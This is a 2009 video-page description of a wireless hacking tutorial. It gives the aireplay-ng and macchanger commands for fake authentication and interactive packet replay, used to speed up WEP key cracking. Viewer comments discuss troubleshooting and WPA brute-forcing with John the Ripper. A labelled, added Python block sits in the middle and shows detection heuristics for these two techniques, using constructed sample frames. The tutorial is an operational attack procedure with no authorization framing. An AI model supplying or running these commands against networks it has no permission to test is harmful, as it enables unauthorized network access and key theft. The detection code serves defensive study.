Authenticate with Secured Networks and generate ARPs - Fake Authentication/Interactive Packet Replay
Uploaded by on Dec 21, 2009

This video demonstrates a wireless hacking technique that can be used when no computers are on a network, no ARP packets are being broadcast, and data flow (IV sniffing) is going very slowly when hacking a wireless network. The techniques are incorporated with Aireplay-ng and are called Fake Authentication and Interactive Packet Replay.

This video is made for those that have already watched my or someone else's wireless hacking video and understand the basic concepts and have either a Backtrack Live-CD or Virtual Machine (Or another Linux distro with Airmon-ng installed).

- Commands Used (Specific to Fake Authentication and Interactive Packet Replay)

macchanger -s wlan0
(Displays the MAC address for my network interface. Please note that your interface may be called something else)

aireplay-ng -1 3000 -e [ESSID - Name of Network] -a [Mac Address of the Access Point] -h [Our systems Mac Address displayed in Macchanger] -o 1 -q 10 wlan0
(This is the command for Fake Authentication, which basically tricks the Access Point into thinking you're a legitimate system on the network, allowing additional techniques to be applied. Once again, your interface name may differ)

aireplay-ng -2 -b 00:1C:10:15:D3:B8 -h 00:15:af:01:9b:1c -c FF:FF:FF:FF:FF:FF -p 0841 wlan0
(This will be the command for Interactive Packet Replay, which allows you to collect packets and, once obtained, replay (inject) the packets, allowing data/IVs to be collected much faster)

After this you can proceed with airodump-ng as usual in the other Konsole shell and crack as usual.
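An added example, not from the video or from the aircrack-ng project: Python detection heuristics a wireless IDS could apply to the two behaviours described above, repeated Open System authentication requests from one station that never associates (fake authentication) and one captured WEP data frame re-injected over and over to the broadcast address (interactive replay). The frame records are constructed sample data; the AP and client MACs are the ones from the replay command above, while the second station MAC and the IV values are made up.

```python
from collections import Counter, defaultdict

BROADCAST = "ff:ff:ff:ff:ff:ff"

# Constructed sample frames: (time_s, subtype, src, dst, wep_iv). The AP and
# injector MACs are the ones from the description above; 00:1e:52:aa:bb:cc is a
# made-up normal station. The auth burst copies the 2-second cadence of the
# "Sending Authentication Request (Open System)" log quoted in the comments.
AP, INJECTOR, STATION = "00:1c:10:15:d3:b8", "00:15:af:01:9b:1c", "00:1e:52:aa:bb:cc"
SAMPLE_FRAMES = (
    [(2.0 * i, "auth", INJECTOR, AP, None) for i in range(4)]      # fake auth retries
    + [(6.5, "auth", STATION, AP, None), (7.0, "assoc", STATION, AP, None)]
    + [(8.0 + 0.01 * i, "data", INJECTOR, BROADCAST, "3a:5c:01") for i in range(200)]
    + [(9.0 + 0.5 * i, "data", STATION, AP, f"11:22:{i:02x}") for i in range(20)]
)


def auth_floods(frames, window_s=10.0, threshold=3):
    """Return {src: count} for stations that send >= threshold authentication
    requests within window_s seconds and never associate. A real client
    authenticates once and then associates; aireplay-ng -1 keeps re-sending."""
    times, associated = defaultdict(list), set()
    for t, subtype, src, _dst, _iv in frames:
        if subtype == "auth":
            times[src].append(t)
        elif subtype == "assoc":
            associated.add(src)
    flagged = {}
    for src, ts in times.items():
        if src in associated:
            continue
        ts.sort()
        for i, start in enumerate(ts):
            n = sum(1 for t in ts[i:] if t - start <= window_s)
            if n >= threshold:
                flagged[src] = max(flagged.get(src, 0), n)
    return flagged


def iv_replays(frames, threshold=50):
    """Return {(src, iv): count} for a WEP IV reused >= threshold times by one
    transmitter to the broadcast address. Interactive replay re-injects the
    identical captured frame, so its IV repeats; a real station's IV changes."""
    seen = Counter((src, iv) for _t, st, src, dst, iv in frames
                   if st == "data" and dst == BROADCAST and iv is not None)
    return {key: n for key, n in seen.items() if n >= threshold}
```

Both functions expect frames already parsed into (time, subtype, src, dst, iv) tuples; feeding them a real capture would mean decoding 802.11 headers first, which this block does not do.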

Uploader Comments (mushroomHEADBANGERS)

  • I know this is not the right vid to comment on WPA, but I will. First of all, when a WPA key is, for ex., 6t7eg7dh00e8he7, how would it be possible to get this key? Is the only option brute force???? If it is, can you please make a vid, or is this unrealistic of me to ask you to do this, because I have heard this can take days. Love your other vids.

    danoxx2

  • There are two types of brute-forcing. True brute forcing basically means that you try every possible combination of characters (with rules in place to restrict size, letters, etc.), which can take a very long time depending on the rules in place. By long time I mean over a year in some cases :P

    The other variant is utilizing wordlists which in your case would prove worthless. However, you can incorporate the two by using John The Ripper. It allows you to add extra characters and so forth.

  • Hi all when I get to this bit:

    aireplay-ng -1 3000 -e [ESSID - Name of Network] -a [Mac Address of the Access Point] -h [Our systems Mac Address displayed in Macchanger] -o 1 -q 10 wlan0

    and hit enter, it tries to work but does not use the correct channel. Instead of using channel 6 it uses 9 and then gives an error of incorrect BSSID.

    The BSSID is correct, as are the MAC and router numbers.

    Any ideas? Thanks.

  • Sorry for the late reply, I've been AFK. You can change your channel by doing this:

    airmon-ng check kill

    airmon-ng stop [ADAPTER]

    airmon-ng start [ADAPTER] 6

    And you can also try this if you have issues with the above mentioned:

    iwconfig [ADAPTER] channel 6

All Comments (183)

  • Nice tutorial man, thanks a lot!!!!

  • Thanks for this great tutorial!

    I got the packets sent, but aircrack doesn't find the key (even after 600.000+ data).

    I tested this on my own network with no computer attached (no wireless and no wired).

    What am I doing wrong? I followed all your steps above!

  • You rock!!!!! And by the way, are there any more BT tutorials of yours?????

  • When I run interactive packet replay - it stops after ~10 packets... Is there a way to make it run longer to collect more packets?

  • HOW DO YOU CHECK TO SEE IF MAC address filtering is enabled?

  • HOW DO YOU LOWER TRANSMIT RATE???????????

  • Fake Authentication failed on me too. I checked everything to be correct (used the right channel and MACs) and no results, it just keeps sending "Sending Authentication Request (Open System)".

    I also used the "check kill" to restart my adapter to the right channel and it didn't work :(

  • When I'm trying to do the interactive packet replay it just keeps saying read (packet number) packets, and it already went up to 98,000 packets and keeps going for like 10 minutes already.

  • @tayjay1983 it's not -9 10, it's -q 10

  • I am capturing data packets really slowly, so I tried your first option, but when I put it in this is what I get out:

    21:37:29 Sending Authentication Request (Open System)

    21:37:31 Sending Authentication Request (Open System)

    21:37:33 Sending Authentication Request (Open System)

    21:37:35 Sending Authentication Request (Open System)

    21:37:37 Sending Authentication Request (Open System)

    until it stops. I know I put the correct info in, but this still happens. Any ideas?
